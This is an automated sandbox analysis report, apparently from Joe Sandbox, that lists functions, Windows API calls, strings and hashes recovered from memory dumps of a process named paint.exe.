EndDialog.USER32 ref: 00007FF6F0BD20F4
SetWindowLongPtrW.USER32 ref: 00007FF6F0BD2116
GetWindowLongPtrW.USER32 ref: 00007FF6F0BD2140
InvalidateRect.USER32 ref: 00007FF6F0BD2160

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: fec8874e5c695777c2cc03d451db32959966f9dd72c11fc4c890c18a75053bb9
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: B611E921A1D582A2F75487A9E6446799253EF96780FC88030DB6B47BCAED3ED4958200

Function 00007FFDFAA02BEC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFDFAA02C18
GetCurrentThreadId.KERNEL32 ref: 00007FFDFAA02C26
GetCurrentProcessId.KERNEL32 ref: 00007FFDFAA02C32
QueryPerformanceCounter.KERNEL32 ref: 00007FFDFAA02C42

Memory Dump Source

Source File: 00000001.00000002.2013426793.00007FFDFAA01000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDFAA00000, based on PE: true

Associated: 00000001.00000002.2013391762.00007FFDFAA00000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAA62000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAAAE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAAB2000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAAB7000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAB0F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAB14000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAB17000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013772305.00007FFDFAB18000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013801898.00007FFDFAB19000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaa00000_paint.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
Instruction ID: e631c1b0d7648dc68c162f743712aa8a2ac18cef600d4e7486e7f1de47392216
Opcode Fuzzy Hash: 109ceed06940f0f17d4484f54d46a13cc3e2d9acbfc7514a401e54a12864ff88
Instruction Fuzzy Hash: E8113026B14F128AEB44CF60E8687B833A4FB19758F445E31DA6D467A8DF7CD159C380

Function 00007FF6F0BDD080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6F0BDD0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF6F0BDD0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF6F0BDD0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF6F0BDD0D6

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: eee3c823fc881fc21cfe4bc9e261bd79af26559fa7f61b5d06186eabb499b955
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: 0D111866B18B05DAEB00CBA0E8552A933A4FB19758F441E35DA6E877A4EF78D1588340

Function 00007FFDFB09DD14 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB09E0A1

Strings

out of memory, xrefs: 00007FFDFB0A2508
string or blob too big, xrefs: 00007FFDFB0A2193

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: out of memory$string or blob too big
API String ID: 4225454184-2410398255
Opcode ID: 5081886879a1dcb09f1a8e8b481931c42fe165402a51258c3fdd95875b174ecb
Instruction ID: 3c82d36648f4c94d52b5a83cca664633b4e9acaf9ca506bb0e748cd17cef9fb8
Opcode Fuzzy Hash: 5081886879a1dcb09f1a8e8b481931c42fe165402a51258c3fdd95875b174ecb
Instruction Fuzzy Hash: 4EC1F762F4E64386FB209A15C5A1B7C67A0EF53B88F044135DB6E47BF9DE2CE845A310

Function 00007FFDFB0D0660 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0D0802
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0D081B

Strings

string or blob too big, xrefs: 00007FFDFB0D092D

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: string or blob too big
API String ID: 4225454184-2803948771
Opcode ID: be8481eede363739fed0dd66ea1266317cdb0fd6630cb3dce840037493bb10fc
Instruction ID: e4713aa2632bf0c8cdb000c4fe68849246abc3d5ac334359b4aa6bef341e0124
Opcode Fuzzy Hash: be8481eede363739fed0dd66ea1266317cdb0fd6630cb3dce840037493bb10fc
Instruction Fuzzy Hash: D9919C22F0A20385FB649B11D475BB96790AF8AB88F044135EE6D073F9EE7CE445A348

Function 00007FFDFB0ACEE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0AD170

Strings

too many SQL variables, xrefs: 00007FFDFB0AD192
variable number must be between ?1 and ?%d, xrefs: 00007FFDFB0AD086

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: too many SQL variables$variable number must be between ?1 and ?%d
API String ID: 4225454184-515162456
Opcode ID: e09e6fc5d94e09abd608d9723023e8c641209e6c7ffc6cc065591c134ea0245c
Instruction ID: d7ba1b4196c45079dddf1c6e0ce2fc395b69c297ca2558314e8bd1151c9b8067
Opcode Fuzzy Hash: e09e6fc5d94e09abd608d9723023e8c641209e6c7ffc6cc065591c134ea0245c
Instruction Fuzzy Hash: 1F81D072B0A64395EB10DB01D864FB97BA9FB52B84F458536DA6C0B6E8DF3CE541E300

Function 00007FFDFB0CA930 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0CA9DD

Strings

no such collation sequence: %s, xrefs: 00007FFDFB0CAB7C
BINARY, xrefs: 00007FFDFB0CA93C

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: BINARY$no such collation sequence: %s
API String ID: 4225454184-2451720372
Opcode ID: 36039a166d4566c31a86ab3c78b31d94099c0d7d54d1d41b2e9264962882269a
Instruction ID: 2d959c14ea98b544a35c120cb0cf35d5d6a1d4d30be059f93470ebf380e3a779
Opcode Fuzzy Hash: 36039a166d4566c31a86ab3c78b31d94099c0d7d54d1d41b2e9264962882269a
Instruction Fuzzy Hash: CB71B362B0AA4351EB189F2195607B96391EB56BA8F484331DE3C072EDDF3CE591D340

Function 00007FFDFB0C9A40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

index '%q', xrefs: 00007FFDFB0C9A92

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID:
String ID: index '%q'
API String ID: 0-1628151297
Opcode ID: 83d82f952d34810ecc43121b50ff9fb09ba70e6d899240e5dfbbe69747771c2e
Instruction ID: d3c416d663be05e3eb4991b72562b13d35a4656030fffeaf159d3515e1d51687
Opcode Fuzzy Hash: 83d82f952d34810ecc43121b50ff9fb09ba70e6d899240e5dfbbe69747771c2e
Instruction Fuzzy Hash: 6271AE72F0964699EB119B65D460ABC3BA0FB45BA8F000636DE2E57BE9DF389441D700

Function 00007FFDFB064A30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB064BCC

Strings

%02d, xrefs: 00007FFDFB064B6E, 00007FFDFB064BD5

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: %02d
API String ID: 4225454184-896308400
Opcode ID: 08179e3aae8af29205a3e48a38053d8be4b8d1364f403436d80ec9c05871a375
Instruction ID: 137ecf1cb55acb62c4421131b5fbb3b2ddcd45829b286b7d7366111fc1e10b97
Opcode Fuzzy Hash: 08179e3aae8af29205a3e48a38053d8be4b8d1364f403436d80ec9c05871a375
Instruction Fuzzy Hash: 1E71CE32B1A69789E7208F64E461BFD7761FB85788F104032EE9D17AADDE38E445DB00

Function 00007FFDFB0FD710 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFDFB0FD9BA,?,?,?,00007FFDFB0FDD7B), ref: 00007FFDFB0FD927

Strings

INS, xrefs: 00007FFDFB0FD889
CRE, xrefs: 00007FFDFB0FD86F

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: CRE$INS
API String ID: 4225454184-4116259516
Opcode ID: c8cc279459b7dc3839fdcad3baef5842beab7df88b6cdea28414d4f9614c85f6
Instruction ID: c5c2e6b65aa0e2713ae97ee0d8eeb8316288715d35e6a95a6acd57708377b6c0
Opcode Fuzzy Hash: c8cc279459b7dc3839fdcad3baef5842beab7df88b6cdea28414d4f9614c85f6
Instruction Fuzzy Hash: 1C518122B0B68341EB609B169470A796B91FF82FC4F548235DD6D4B7EDDE3CE402A380

Function 00007FF6F0BF5B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F0BF17D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF1803

_get_daylight.LIBCMT ref: 00007FF6F0BF5CA4
_get_daylight.LIBCMT ref: 00007FF6F0BF5CB5

Strings

?, xrefs: 00007FF6F0BF5C35

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction ID: 50afb2f535af5cd588d30a6cce8bf657457c97fc794cc3acbba9ef9be5b012a1
Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction Fuzzy Hash: 92412726A0C38262FF209B6594013795698EB82BA5F904235EF7F87BD5FF3ED4418700

Function 00007FF6F0BE9084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE90B6

Part of subcall function 00007FF6F0BEA9B8: HeapFree.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9CE
Part of subcall function 00007FF6F0BEA9B8: GetLastError.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6F0BDCC15), ref: 00007FF6F0BE90D4

Strings

C:\Users\user\Desktop\paint.exe, xrefs: 00007FF6F0BE90C2

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\paint.exe
API String ID: 3580290477-805208900
Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction ID: 5fa3d13b04e764bf0fb41abbcfc1196389664612a6ee61fba1c50a048ba0f767
Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction Fuzzy Hash: 0F417F36A08B53A6EB14DF25D4400BD63A4EF467D0B954075ED6F83BC6EE3EE4958340

Function 00007FFDFB069890 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0699AE
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0699F2

Strings

@, xrefs: 00007FFDFB0699DC

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: @
API String ID: 4225454184-2766056989
Opcode ID: 6aeb7031c098a32b12fcbd9a89e04e02ea86af416b89c4cbacbb9356da985678
Instruction ID: ca4d5a29186fd14719bbf001966855365b2c8905bf37e2120ff2880e88d1ddbb
Opcode Fuzzy Hash: 6aeb7031c098a32b12fcbd9a89e04e02ea86af416b89c4cbacbb9356da985678
Instruction Fuzzy Hash: 9E41C2A2F0F6838AF7519B25A8719F56391AF4A788F044139D86D026FEDF6CB088D744

Function 00007FF6F0BECCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6F0BECDBF
GetLastError.KERNEL32 ref: 00007FF6F0BECDE1

Strings

U, xrefs: 00007FF6F0BECD6B

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 1248eb2e0edb7a13df03bfeee9d771d34271181080581012650bfa16a04786cc
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 6141B472B18A4595DB208F25E8443A96765FB99794FC08031EE5EC77D8EF3ED401C740

Function 00007FFE007680D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 00007FFE0076811D
SystemTimeToFileTime.KERNEL32 ref: 00007FFE0076812D

Strings

gfff, xrefs: 00007FFE0076815F

Memory Dump Source

Source File: 00000001.00000002.2016607190.00007FFE00761000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00760000, based on PE: true

Associated: 00000001.00000002.2016576633.00007FFE00760000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE007E3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE0080D000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE00818000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016607190.00007FFE00823000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016859124.00007FFE00827000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2016893620.00007FFE00829000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00760000_paint.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
Instruction ID: dd9afd47a17b20d07f16837a4d6ad0e51b85fcdb3d73576fa96add59b5c094ab
Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
Instruction Fuzzy Hash: 7221D572A0968B86DB98DF29D4003B976E4FB89B84F488139DB4E87769DE3CD1418B01

Function 00007FF6F0BEF628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6F0BEF668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6F0BEF6BA

Strings

:, xrefs: 00007FF6F0BEF67E

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction ID: 1649b0adae0421e439bd1163fabc03e1f2b7601d75be50cd600468e237bf34c7
Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction Fuzzy Hash: 58210463B0828296FB209B11D04426D73B2FB85B44FD58035DAAE837D4EF7EE945CB40

Function 00007FF6F0BDFDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF6F0BDFE08
RaiseException.KERNEL32 ref: 00007FF6F0BDFE49

Strings

csm, xrefs: 00007FF6F0BDFE36

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
